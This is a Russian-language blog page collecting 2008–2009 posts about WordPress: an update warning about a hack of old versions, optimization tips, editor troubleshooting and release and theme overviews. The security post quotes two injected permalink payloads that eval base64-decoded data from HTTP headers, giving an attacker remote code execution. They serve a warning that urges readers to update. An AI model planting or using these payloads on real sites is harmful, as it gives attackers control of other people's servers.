Дом моих мыслей

Записи с тегом "Wordpress"

WordPress. Взлом старых версий

08.09.2009

WordpressОчередная маст рид заметка о безопасности WordPress. Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда — обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.

Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.

Атакованные блоги подвергаются хаку, который добавляет к пермалинку:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Продолжить чтение »

, , Wordpress

Оптимизация WordPress

06.08.2009

WordpressПоговорим об оптимизации WordPress. Писано про это уже столько, что можно начать оптимизацию с  базы, а закончить вебсервером. И поговорим потому, что несколько блогов, за последнее время, обратились за помощью. И не в том, что CMS последних версий стала плохо, а из-за того, что ряд есть сторонних причин, которые мешают системе или затормаживают ее.

Причина такой заторможенности как правило либо в плагинах, либо в теме, что встречается уже очень часто. Однажды была запись у меня о том, как можно оптимизировать тему WordPress, чтобы она заработала быстрее. Но это мелочи, которые лучше оставить на потом, на сладкое.

  • Оптимизация начинается с базы данных. Нужно оптимизировать таблицы. Заходим в phpMyAdmin, выбираем нашу БД и далее:

phpMyAdmin - оптимизация таблиц БД

Это поможет серверу БД более быстро работать с таблицами, что немного снизит нагрузку. В более ранних версиях phpMyAdmin может не быть пункта «Отметить требующие оптимизации». Тогда просто выбираете все таблицы и делаете с отмеченными «Оптимизировать».

  • Избавляемся от всех не нужных плагинов и особенно от тех, которые не совместимы с данной версией CMS. Очень часто такие плагины не совсем корректно работают.
  • Удаляем из темы 3 абсолютно не нужные вещи: версию движка и, если не планируете использовать Windows Live Writer, то и манифест. Добавляем 3 строчки кода в файл functions.php:

<?php remove_action(‘wp_head’, ‘wp_generator’); ?>
<?php remove_action(‘wp_head’, ‘wlwmanifest_link’); ?>
<?php remove_action(‘wp_head’, ‘rsd_link’); ?>

  • Отключаем ревизии записей без плагина. Добавляем в файл wp-config.php следующую строку:

define('WP_POST_REVISIONS', false);

Для удаления существующих ревизий (если не умеете — лучше не лазить):
DELETE a,b,c
FROM wp_posts a
LEFT JOIN wp_term_relationships b ON (a.ID = b.object_id)
LEFT JOIN wp_postmeta c ON (a.ID = c.post_id)
WHERE a.post_type = ‘revision’

Продолжить чтение »

, Wordpress

WordPress 2.8 и TinyMCE

01.07.2009

WordpressПосле совсем недавнего обновления блога на новый WordPress 2.8 и обновления плагина TinyMCE Advanced столкнулся с такой проблемой, что сам редактор взял и пропал.

Я без редактора как без рук — он мне строить и жить помогает, а потому его пропажа меня сильно расстроила.  Пропажа связана с работой плагина с компрессией. Вариантов лечения может быть 2: изменение конфига редактора или добавление одного файла.

Проблема с TinyMCE

Продолжить чтение »

, , Wordpress

WordPress 2.8

23.05.2009

WordpressСледующий шаг в версии нашего любимого движка для блогов, но версия пока beta1. В полной версии будет 788 различных фиксов. Я же, как обычно, поворчу, что «надобавляли всякой не совсем нужной начинки», но пользоваться буду как пользуюсь вовсю версией 2.7, правда иногда напрягающие  штуки хочется вырезать «на корню» 🙂

А теперь о том, что нас ждет внутри:

  • Добавлена функция загрузки тем с WordPress.org или вашего ПК. Я начал использовать функцию скачивания плагинов, это удобно, но вот менять темы как перчатки — думаю, не важное дополнение.
  • Обновили процедуру установки плагинов.
  • Контроль версий установленных тем — обновлять темы легко, а вот более старую версию нельзя установить не удалив новую.
  • Обновлена работа с виджетами как визуально, так и в коде.
  • Обновился визуальный редактор постов до версии 3.2.3. Я со стандартным редактором не работаю вообще, потому тут комментировать не могу, на сколько удобным он стал.
  • Добавлена подсветка кода в редакторе плагинов и тем.
  • Добавлено много новых функций(например, надпись о том, что у вас пароль случайный вам стоит его сменить или отказаться), исправлены старые.
  • и еще целый список…

Wordpress 2.8 внутри

+ небольшое видео о WordPress 2.8

, Wordpress

Пара штучек для WordPress

31.03.2009

Вступление.
WordpressИсключительно технический пост, т.к. в комментариях было, что начинал блог с WordPress, а сейчас все про картинки и т.д.
На самом деле я стал писать о WordPress меньше умышленно, стал переводить темы только на заказ, т.е. Вы попросили — я сделал или если мне самому очень нравится тема, плагины — тоже самое. Все это потому, что раньше был интерес, энтузязизм. Хотелось полезного людям дать. А сейчас? Сейчас столько всяких сайтов и блогов на эту тему, что только ленивый еще не завел у себя рубрику, блог и т.д. про это и не пытается заработать. Вот такие дела, скучно =)

Ну да теперь к паре штучек для вашего блога:

1. Убираем ненужное (как и можно много еще чего из вашей темы)

Если Вы откроете исходный код страницы вашего блога, то увидите вот такие строки:

Продолжить чтение »

, , Wordpress

FREEmium

20.01.2009

WordpressКрасивая тема, функциональная, удобная: FREEmium. Основными характерными особенностями темы является ее оформление в стиле premium, которые обычно платные. Данная тема сделана с использованием jQuery, поддерживает древовидные комментарии.

У темы 2 сайдбара на одном из которых можно поместить необходимые для виджеты, а второй использовать для рекламы, например. Основной цвет — песочный.

FREEmium

Продолжить чтение »

, , , Темы

WordPress 2.7. Красота.

12.11.2008

OMG! Чувак, ты в космосе!

WordpressОчередная красивая версия WordPress — 2.7 (не удержался и скачал). На этапе разработки меня пугали всякие, имхо, не нужные  штучки типа древовидного комментирования и т.п. — все это делается плагинами и лишний код не стоит добавлять. Хотя я так говорю всегда и потом привыкаю к эдаким штукам или просто их выключаю разными способами. Но то, что они сделали с админкой — шикарно =)

Если Вы ее еще не видели — скачайте посмотрите, это элегантно и приятно. Жаль, что они не додумались вставить ее в 2.6.х

Доска объявлений

Поражает новый дизайн, как я и говорил выше — симпатично, а местами практично. Очень чисто и приятно выглядит.

Wordpress 2.7: Доска объявлений

Продолжить чтение »

, , Wordpress

Всякости сетевые

04.11.2008

Проход по интернету. Мнения, полезности, новинки…

Лена, ака Девушка живущая в Сети, написала свое мнение по семинарам AGA-08.

Я очень рада за подавляющее количество людей в аудитории, которые по выражению Миколки “строчили” за докладчиками. В наше время такие семинары показались бы сказкой…

Уже выполнила Д/з и надеюсь по результатам обучения стать еще более продвинутой блондинкой :))

заметкиТак ли это, я проверю, на следующем семинаре. =) К ее мнению приложены фотографии, которые помогут оценить масштабы и суть происходящего. Сделаем байнет шире! ©Я. Может мне тоже замутить какой-нибудь семинар, назвать селебрити белорусского блоггинга и рассказать людям, что блоги, все же, это не только рыжая кнопка «Подпишись» (этот момент, как мне как-то объяснили, отличает блог от сайта. Не знал.) и то как стать миллионером, а гораздо большее…

О хороших журналах я стараюсь писать, советовать их вам, нашел вот еще один, сетевой. Журнал SEODigest Magazine. Из него себе отметил:

«Перспективы блогосферы. Что дальше?»
Заслюнявленная до дыр тема про кнопку бабло — «Обзор и сравнение ведущих бирж купли/продажи ссылок»

Там еще есть про интернет-магазины и блоги, про закладки, реклама-реклама, реклама… В целом забавное издание, буду читать. Минус — нет pdf. Имхо, без pdf обойтись нынче нельзя, а вот без флеша — еще как можно.

По WordPress я давненько не писал ничего и тут вот новость: на днях вышел 2.7 Beta 1, в которой представлен новый дизайн, кое-что поменялось — комментарии точно. Я себе ее ставить не хочу, даже для тестов, а финал-релиз меня вообще пугает.

Ждать придется до конца ноября, если хотите получить 2.7, который будет стабильным, а пока  ожидаете — займитесь подготовкой темы к совместимости с 2.7:

WordPress 2.7 includes a lot of new enhancements, but one of the big ones is the new comment functionality. Comments can be threaded, paged, etc. This is all built in, but unfortunately, your theme must support it. So, for theme authors, I’d suggest getting to work on making your themes compatible right away. Полностью материал

MISC: Заказать срочный выкуп квартир Москва и в регионах.

, , , Читать здесь

Обзор блогов

10.10.2008

… и не только. Точнее совсем нет.

Первым пойдет новый проект с названием «Имею мнение». Что это: социальная сеть, сервис или т.п. — не указано нигде. Кнопки типа «о сайте» нигде нету, потому буду звать просто — проект (автор такого же мнения).

Мнение имею

Суть, если вы знаете, что такое хабр рассказывать не буду, а вкратце — коллективный блог. Вот нечто подобное появилось у нас. Проект, для коллективного труда, призванный собирать интересные новости со всего интернета.

Продолжить чтение »

, , , Читать здесь

Я хочу плагин, который…

22.09.2008

WordpressДля WordPress пишется и написано огромное количество плагинов. Следующая версия (2.7) будет иметь в себе уже много полезных плагинов, механизм их поиска и т.д. (Честно — ужасно это, лучше было бы упростить, облегчить, а все дополнения можно скачать)

Не всем интересно искать плагины через их главное хранилище, по форумам и т.д. , а есть люди, которые и не знают об их существовании 😉 Нашел я такую страничку, которая поможет упростить поиск необходимой информации:

450+ плагинов

Советую заглянуть I want a WordPress Plugin to…

, Плагины